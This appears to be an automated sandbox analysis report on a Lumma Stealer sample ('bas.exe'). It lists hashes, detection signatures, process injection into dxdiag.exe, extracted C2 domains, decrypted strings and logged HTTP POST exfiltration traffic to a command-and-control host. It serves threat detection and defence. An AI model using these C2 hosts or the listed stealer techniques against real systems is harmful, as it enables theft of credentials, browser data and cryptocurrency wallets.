
Windows Analysis Report
bas.exe

Overview

General Information

Sample name: bas.exe
Analysis ID: 1579571
MD5: d5139ae53cb10a64c9245bbf3447ed1c
SHA1: 727199337e080c162fd86558a697b3bcbce646e1
SHA256: 8ad2dcb075a7da5785530bc805b5391a397e1c659bedcb564774b6940b7fcbed
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • bas.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\bas.exe" MD5: D5139AE53CB10A64C9245BBF3447ED1C)
    • dxdiag.exe (PID: 7516 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
    • dxdiag.exe (PID: 7524 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["energyaffai.lat", "crosshuaht.lat", "aspecteirs.lat", "volcanohushe.click", "discokeyus.lat", "rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "necklacebudi.lat"], "Build id": "pqZnKP--ZnVja2luZ1"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: dxdiag.exe PID: 7524 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: dxdiag.exe PID: 7524 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T01:22:09.042301+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:11.200792+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:13.656018+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49708 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:16.080339+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:18.557909+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49710 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:21.368165+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49712 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:23.820880+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49713 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:27.362380+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49714 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:09.919391+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:11.956641+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:09.919391+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:11.956641+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 104.21.71.155 | 443 | TCP
2024-12-23T01:22:22.132533+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49712 | 104.21.71.155 | 443 | TCP


AV Detection

Source: 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "crosshuaht.lat", "aspecteirs.lat", "volcanohushe.click", "discokeyus.lat", "rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "necklacebudi.lat"], "Build id": "pqZnKP--ZnVja2luZ1"}
Source: bas.exe | ReversingLabs: Detection: 26%
Source: bas.exe | Virustotal: Detection: 30%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: rapeflowwj.lat
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: crosshuaht.lat
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: sustainskelet.lat
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: aspecteirs.lat
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: energyaffai.lat
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: necklacebudi.lat
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: discokeyus.lat
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: grannyejh.lat
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: volcanohushe.click
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: pqZnKP--ZnVja2luZ1
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: bas.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\SysWOW64\dxdiag.exe | Directory queried: number of queries: 1001

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49707 -> 104.21.71.155:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 104.21.71.155:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 104.21.71.155:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.71.155:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49712 -> 104.21.71.155:443
Source: Malware configuration extractor | URLs: energyaffai.lat
Source: Malware configuration extractor | URLs: crosshuaht.lat
Source: Malware configuration extractor | URLs: aspecteirs.lat
Source: Malware configuration extractor | URLs: volcanohushe.click
Source: Malware configuration extractor | URLs: discokeyus.lat
Source: Malware configuration extractor | URLs: rapeflowwj.lat
Source: Malware configuration extractor | URLs: sustainskelet.lat
Source: Malware configuration extractor | URLs: grannyejh.lat
Source: Malware configuration extractor | URLs: necklacebudi.lat
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.71.155:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.71.155:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.71.155:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.71.155:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.21.71.155:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.71.155:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.71.155:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.71.155:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: volcanohushe.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 52
    Host: volcanohushe.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=MA0CHNK04GEMHC3RI7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12851
    Host: volcanohushe.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=QYJM3V1ZQPMP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15044
    Host: volcanohushe.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=95LDDMB43LT0XK
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20223
    Host: volcanohushe.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=ZEM9UWIBZYJT
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1208
    Host: volcanohushe.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=2IWMDEENI15
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 571518
    Host: volcanohushe.click
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: volcanohushe.click
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: volcanohushe.click
Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: dxdiag.exe, 00000003.00000003.1558445081.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579174438.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620904755.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1558296148.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1621063252.0000000002CE6000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579403717.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://volcanohushe.click
Source: dxdiag.exe, 00000003.00000003.1479470457.0000000002D04000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579103745.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1479269620.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1479395130.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620854063.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596299613.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://volcanohushe.click/
Source: dxdiag.exe, 00000003.00000002.1631649522.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596096341.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620854063.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596299613.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://volcanohushe.click/H
Source: dxdiag.exe, 00000003.00000003.1579103745.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620854063.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002D21000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596299613.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1528700860.0000000005163000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://volcanohushe.click/api
Source: dxdiag.exe, 00000003.00000002.1631649522.0000000002D21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://volcanohushe.click/apiBG
Source: dxdiag.exe, 00000003.00000003.1479269620.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1479470457.0000000002D04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://volcanohushe.click/apiH
Source: dxdiag.exe, 00000003.00000003.1528700860.0000000005163000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://volcanohushe.click/apie
Source: dxdiag.exe, 00000003.00000003.1621063252.0000000002D05000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579174438.0000000002D05000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://volcanohushe.click/apie4
Source: dxdiag.exe, 00000003.00000003.1528700860.0000000005163000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://volcanohushe.click/apieO
Source: dxdiag.exe, 00000003.00000003.1579103745.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://volcanohushe.click/apif
Source: dxdiag.exe, 00000003.00000002.1631649522.0000000002D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://volcanohushe.click/apis
Source: dxdiag.exe, 00000003.00000003.1579563478.0000000002D21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://volcanohushe.click/k
Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: dxdiag.exe, 00000003.00000003.1530198927.000000000525A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D07E513_3_02D07E51
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D07E513_3_02D07E51
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D07E513_3_02D07E51
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D07E513_3_02D07E51
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5/0@1/1
            Source: bas.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\bas.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
